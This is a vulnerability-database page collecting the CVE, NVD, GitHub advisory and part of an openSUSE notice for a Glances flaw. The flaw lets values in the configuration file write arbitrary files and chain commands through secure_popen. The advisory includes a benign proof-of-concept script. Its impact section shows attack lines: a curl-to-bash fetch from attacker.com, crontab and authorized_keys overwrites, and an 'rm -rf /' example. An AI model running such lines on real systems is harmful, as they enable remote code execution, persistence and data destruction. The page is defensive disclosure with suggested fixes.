Vulnerability-Lookup

CVE-2026-53925 (GCVE-0-2026-53925)

Vulnerability from cvelistv5 – Published: 2026-06-25 18:03 – Updated: 2026-06-25 18:25

Title

Glances: Arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration

Summary

Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets > (file redirection), | (pipe), and && (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via >), chain arbitrary commands (via &&), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.

Severity

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/nicolargo/glances/security/adv…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
nicolargo	glances	Affected: >= 4.0.8, < 4.5.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-53925",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-25T18:25:09.523064Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-25T18:25:13.508Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "glances",
          "vendor": "nicolargo",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 4.0.8, \u003c 4.5.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-25T18:03:43.333Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
        }
      ],
      "source": {
        "advisory": "GHSA-3vwc-qwhc-3mj7",
        "discovery": "UNKNOWN"
      },
      "title": "Glances: Arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-53925",
    "datePublished": "2026-06-25T18:03:43.333Z",
    "dateReserved": "2026-06-11T15:46:12.316Z",
    "dateUpdated": "2026-06-25T18:25:13.508Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-53925",
      "date": "2026-06-26",
      "epss": "0.00184",
      "percentile": "0.08163"
    },
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-53925\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-25T18:25:09.523064Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-25T18:24:59.937Z\"}}], \"cna\": {\"title\": \"Glances: Arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration\", \"source\": {\"advisory\": \"GHSA-3vwc-qwhc-3mj7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.0.8, \u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:03:43.333Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-53925\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-25T18:25:13.508Z\", \"dateReserved\": \"2026-06-11T15:46:12.316Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:03:43.333Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-53925

Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-25 19:58

Severity

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "affected": [
    {
      "affectedData": [
        {
          "product": "glances",
          "vendor": "nicolargo",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 4.0.8, \u003c 4.5.5"
            }
          ]
        }
      ],
      "source": "security-advisories@github.com"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5."
    }
  ],
  "id": "CVE-2026-53925",
  "lastModified": "2026-06-25T19:58:30.847",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ],
    "ssvcV203": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "ssvcData": {
          "id": "CVE-2026-53925",
          "options": [
            {
              "exploitation": "poc"
            },
            {
              "automatable": "no"
            },
            {
              "technicalImpact": "total"
            }
          ],
          "role": "CISA Coordinator",
          "timestamp": "2026-06-25T18:25:09.523064Z",
          "version": "2.0.3"
        }
      }
    ]
  },
  "published": "2026-06-25T19:16:40.017",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-3VWC-QWHC-3MJ7

Vulnerability from github – Published: 2026-06-23 17:59 – Updated: 2026-06-23 17:59

Summary

Glances has arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration

Details

Summary

The secure_popen() function in glances/secure.py interprets > (file redirection), | (pipe), and && (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command.

When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via >), chain arbitrary commands (via &&), or pipe command output to arbitrary programs (via |).

Crucially, this vulnerability is not mitigated by the --disable-config-exec flag that was introduced to address CVE-2026-33641. That flag only disables backtick command execution in config.get_value(); it does not affect the secure_popen() function's interpretation of shell-like operators.

Details

Affected code path 1 — Default AMP (glances/amps/default/__init__.py:69)

res = self.get('command')
# ...
self.set_result(secure_popen(res).rstrip())

The command config value is loaded from [amp_<name>] sections via GlancesAmp.load_config() (glances/amps/amp.py:81):

self.configs[param] = config.get_value(amp_section, param).split(',')

Affected code path 2 — SystemV AMP (glances/amps/systemv/__init__.py:60)

res = secure_popen(self.get('service_cmd'))

The service_cmd config value is loaded from [amp_systemv] sections via the same GlancesAmp.load_config() method.

Sink — secure_popen() (glances/secure.py:33-77)

The function explicitly parses: - > for file redirection (line 39): cmd.split('>') — the path after > is used directly in open(stdout_redirect, "w") (line 71) with no path validation. - | for command piping (line 51): cmd.split('|') — each segment is executed as a separate Popen with stdout piped to the next. - && for command chaining (line 27 in secure_popen): cmd.split('&&') — each segment is executed sequentially.

None of these operators are sanitized or restricted when loading AMP configuration values.

Why --disable-config-exec does not help:

The --disable-config-exec flag (introduced for CVE-2026-33641) only prevents system_exec() from running backtick-embedded commands in config.get_value(). It does not affect how the resulting string value is processed by secure_popen(). A command value like echo data > /etc/crontab contains no backticks and passes through get_value() unchanged, then secure_popen() interprets the > operator and writes to the arbitrary path.

PoC

Clean-checkout recipe:

Create a test configuration file:

cat > /tmp/poc-glances.conf << 'EOF'
[amp_poc]
enable=true
regex=.*
refresh=3
command=echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp

[outputs]
cors_origins=*
EOF

Run a Python script that simulates the AMP command execution path:

import sys
sys.path.insert(0, '/path/to/glances')
from glances.config import Config
from glances.secure import secure_popen
import os

# Load config with --disable-config-exec ACTIVE (CVE-2026-33641 mitigation)
config = Config(config_dir='/tmp/poc-glances.conf', disable_config_exec=True)

# Read AMP command value (same as amp.py load_config)
command = config.get_value('amp_poc', 'command')
print(f'Command: {command!r}')

# Execute (same as amps/default/__init__.py line 69)
marker = '/tmp/cve-poc-marker-amp'
assert not os.path.exists(marker), 'Clean state required'
result = secure_popen(command)
print(f'Result: {result!r}')

# Verify arbitrary file write occurred
assert os.path.exists(marker), 'VULNERABILITY NOT CONFIRMED'
with open(marker) as f:
    content = f.read()
print(f'Written to {marker}: {content!r}')
assert 'POC_ARBITRARY_FILE_WRITE' in content

# Cleanup
os.remove(marker)
print('CONFIRMED: Arbitrary file write via secure_popen > in AMP command')

Expected vulnerable output:

Command: 'echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp'
Result: 'POC_ARBITRARY_FILE_WRITE\n'
Written to /tmp/cve-poc-marker-amp: 'POC_ARBITRARY_FILE_WRITE\n'
CONFIRMED: Arbitrary file write via secure_popen > in AMP command

Negative/control case (demonstrating --disable-config-exec only blocks backticks):

# This IS blocked by --disable-config-exec:
# command=`rm -rf /` → get_value() skips backtick execution

# This is NOT blocked by --disable-config-exec:
# command=echo data > /etc/crontab → secure_popen writes to /etc/crontab

Cleanup:

rm -f /tmp/poc-glances.conf /tmp/cve-poc-marker-amp

Impact

An attacker who can modify glances.conf (e.g., through a separate file-write vulnerability, a misconfigured shared filesystem, a configuration management system, or a container volume mount) can:

Write arbitrary content to arbitrary files via the > operator — e.g., overwriting /etc/crontab, ~/.ssh/authorized_keys, or any file writable by the Glances process user.
Execute arbitrary commands via the && and | operators — e.g., echo x && curl http://attacker.com/shell.sh | bash.
Exfiltrate data via the | operator piping command output to network utilities.

The existing --disable-config-exec mitigation for CVE-2026-33641 does not protect against this vulnerability because it operates at a different layer (config.get_value() backtick processing vs. secure_popen() operator interpretation).

Suggested remediation

Remove file redirection support from secure_popen() unless explicitly required. The > operator in __secure_popen() (lines 39-45, 69-72) writes to arbitrary paths. Consider removing this feature or restricting output paths to a safe directory (e.g., a configured output directory with path traversal protection).
Sanitize AMP command values before passing them to secure_popen(). Apply the same sanitization used in actions.py:_sanitize_mustache_dict() to strip &&, |, >>, and > from AMP command and service_cmd config values, or refuse to execute commands containing these operators.
Consider replacing secure_popen() with subprocess.run(shell=False) using explicit argument arrays. The secure_popen() function reimplements shell-like operator parsing (&&, |, >) which is inherently risky. Standard subprocess.run() with shell=False and an explicit argument list avoids this class of vulnerability entirely.
Add a regression test that verifies AMP commands cannot contain file redirection or command chaining operators.

Severity

7.8 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "glances"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.8"
            },
            {
              "fixed": "4.5.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-53925"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T17:59:01Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe `secure_popen()` function in `glances/secure.py` interprets `\u003e` (file redirection), `|` (pipe), and `\u0026\u0026` (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command.\n\nWhen Application Monitoring Process (AMP) modules load their `command` or `service_cmd` configuration values from `glances.conf`, those values are passed directly to `secure_popen()` with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via `\u003e`), chain arbitrary commands (via `\u0026\u0026`), or pipe command output to arbitrary programs (via `|`).\n\nCrucially, this vulnerability is **not mitigated** by the `--disable-config-exec` flag that was introduced to address CVE-2026-33641. That flag only disables backtick command execution in `config.get_value()`; it does not affect the `secure_popen()` function\u0027s interpretation of shell-like operators.\n\n### Details\n\n**Affected code path 1 \u2014 Default AMP (`glances/amps/default/__init__.py:69`)**\n\n```python\nres = self.get(\u0027command\u0027)\n# ...\nself.set_result(secure_popen(res).rstrip())\n```\n\nThe `command` config value is loaded from `[amp_\u003cname\u003e]` sections via `GlancesAmp.load_config()` (`glances/amps/amp.py:81`):\n\n```python\nself.configs[param] = config.get_value(amp_section, param).split(\u0027,\u0027)\n```\n\n**Affected code path 2 \u2014 SystemV AMP (`glances/amps/systemv/__init__.py:60`)**\n\n```python\nres = secure_popen(self.get(\u0027service_cmd\u0027))\n```\n\nThe `service_cmd` config value is loaded from `[amp_systemv]` sections via the same `GlancesAmp.load_config()` method.\n\n**Sink \u2014 `secure_popen()` (`glances/secure.py:33-77`)**\n\nThe function explicitly parses:\n- `\u003e` for file redirection (line 39): `cmd.split(\u0027\u003e\u0027)` \u2014 the path after `\u003e` is used directly in `open(stdout_redirect, \"w\")` (line 71) with **no path validation**.\n- `|` for command piping (line 51): `cmd.split(\u0027|\u0027)` \u2014 each segment is executed as a separate `Popen` with stdout piped to the next.\n- `\u0026\u0026` for command chaining (line 27 in `secure_popen`): `cmd.split(\u0027\u0026\u0026\u0027)` \u2014 each segment is executed sequentially.\n\nNone of these operators are sanitized or restricted when loading AMP configuration values.\n\n**Why `--disable-config-exec` does not help:**\n\nThe `--disable-config-exec` flag (introduced for CVE-2026-33641) only prevents `system_exec()` from running backtick-embedded commands in `config.get_value()`. It does not affect how the resulting string value is processed by `secure_popen()`. A command value like `echo data \u003e /etc/crontab` contains no backticks and passes through `get_value()` unchanged, then `secure_popen()` interprets the `\u003e` operator and writes to the arbitrary path.\n\n### PoC\n\n**Clean-checkout recipe:**\n\n1. Create a test configuration file:\n\n```bash\ncat \u003e /tmp/poc-glances.conf \u003c\u003c \u0027EOF\u0027\n[amp_poc]\nenable=true\nregex=.*\nrefresh=3\ncommand=echo POC_ARBITRARY_FILE_WRITE \u003e /tmp/cve-poc-marker-amp\n\n[outputs]\ncors_origins=*\nEOF\n```\n\n2. Run a Python script that simulates the AMP command execution path:\n\n```python\nimport sys\nsys.path.insert(0, \u0027/path/to/glances\u0027)\nfrom glances.config import Config\nfrom glances.secure import secure_popen\nimport os\n\n# Load config with --disable-config-exec ACTIVE (CVE-2026-33641 mitigation)\nconfig = Config(config_dir=\u0027/tmp/poc-glances.conf\u0027, disable_config_exec=True)\n\n# Read AMP command value (same as amp.py load_config)\ncommand = config.get_value(\u0027amp_poc\u0027, \u0027command\u0027)\nprint(f\u0027Command: {command!r}\u0027)\n\n# Execute (same as amps/default/__init__.py line 69)\nmarker = \u0027/tmp/cve-poc-marker-amp\u0027\nassert not os.path.exists(marker), \u0027Clean state required\u0027\nresult = secure_popen(command)\nprint(f\u0027Result: {result!r}\u0027)\n\n# Verify arbitrary file write occurred\nassert os.path.exists(marker), \u0027VULNERABILITY NOT CONFIRMED\u0027\nwith open(marker) as f:\n    content = f.read()\nprint(f\u0027Written to {marker}: {content!r}\u0027)\nassert \u0027POC_ARBITRARY_FILE_WRITE\u0027 in content\n\n# Cleanup\nos.remove(marker)\nprint(\u0027CONFIRMED: Arbitrary file write via secure_popen \u003e in AMP command\u0027)\n```\n\n**Expected vulnerable output:**\n\n```\nCommand: \u0027echo POC_ARBITRARY_FILE_WRITE \u003e /tmp/cve-poc-marker-amp\u0027\nResult: \u0027POC_ARBITRARY_FILE_WRITE\\n\u0027\nWritten to /tmp/cve-poc-marker-amp: \u0027POC_ARBITRARY_FILE_WRITE\\n\u0027\nCONFIRMED: Arbitrary file write via secure_popen \u003e in AMP command\n```\n\n**Negative/control case (demonstrating `--disable-config-exec` only blocks backticks):**\n\n```python\n# This IS blocked by --disable-config-exec:\n# command=`rm -rf /` \u2192 get_value() skips backtick execution\n\n# This is NOT blocked by --disable-config-exec:\n# command=echo data \u003e /etc/crontab \u2192 secure_popen writes to /etc/crontab\n```\n\n**Cleanup:**\n\n```bash\nrm -f /tmp/poc-glances.conf /tmp/cve-poc-marker-amp\n```\n\n### Impact\n\nAn attacker who can modify `glances.conf` (e.g., through a separate file-write vulnerability, a misconfigured shared filesystem, a configuration management system, or a container volume mount) can:\n\n1. **Write arbitrary content to arbitrary files** via the `\u003e` operator \u2014 e.g., overwriting `/etc/crontab`, `~/.ssh/authorized_keys`, or any file writable by the Glances process user.\n\n2. **Execute arbitrary commands** via the `\u0026\u0026` and `|` operators \u2014 e.g., `echo x \u0026\u0026 curl http://attacker.com/shell.sh | bash`.\n\n3. **Exfiltrate data** via the `|` operator piping command output to network utilities.\n\nThe existing `--disable-config-exec` mitigation for CVE-2026-33641 does not protect against this vulnerability because it operates at a different layer (`config.get_value()` backtick processing vs. `secure_popen()` operator interpretation).\n\n### Suggested remediation\n\n1. **Remove file redirection support from `secure_popen()`** unless explicitly required. The `\u003e` operator in `__secure_popen()` (lines 39-45, 69-72) writes to arbitrary paths. Consider removing this feature or restricting output paths to a safe directory (e.g., a configured output directory with path traversal protection).\n\n2. **Sanitize AMP command values** before passing them to `secure_popen()`. Apply the same sanitization used in `actions.py:_sanitize_mustache_dict()` to strip `\u0026\u0026`, `|`, `\u003e\u003e`, and `\u003e` from AMP command and service_cmd config values, or refuse to execute commands containing these operators.\n\n3. **Consider replacing `secure_popen()` with `subprocess.run(shell=False)`** using explicit argument arrays. The `secure_popen()` function reimplements shell-like operator parsing (`\u0026\u0026`, `|`, `\u003e`) which is inherently risky. Standard `subprocess.run()` with `shell=False` and an explicit argument list avoids this class of vulnerability entirely.\n\n4. **Add a regression test** that verifies AMP commands cannot contain file redirection or command chaining operators.",
  "id": "GHSA-3vwc-qwhc-3mj7",
  "modified": "2026-06-23T17:59:01Z",
  "published": "2026-06-23T17:59:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-3vwc-qwhc-3mj7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nicolargo/glances"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Glances has arbitrary file write and command execution via `secure_popen` redirection and chaining operators in AMP command configuration"
}

OPENSUSE-SU-2026:11122-1

Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00

Summary

glances-common-4.5.5-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: glances-common-4.5.5-1.1 on GA media

Description of the patch: These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-11122

CVE-2026-46606

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64	—	Vendor Fix

Threats

Impact important

CVE-2026-46607

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64	—	Vendor Fix

Threats

Impact important

CVE-2026-46608

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Affected products

Recommended 16 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64	—	Vendor Fix
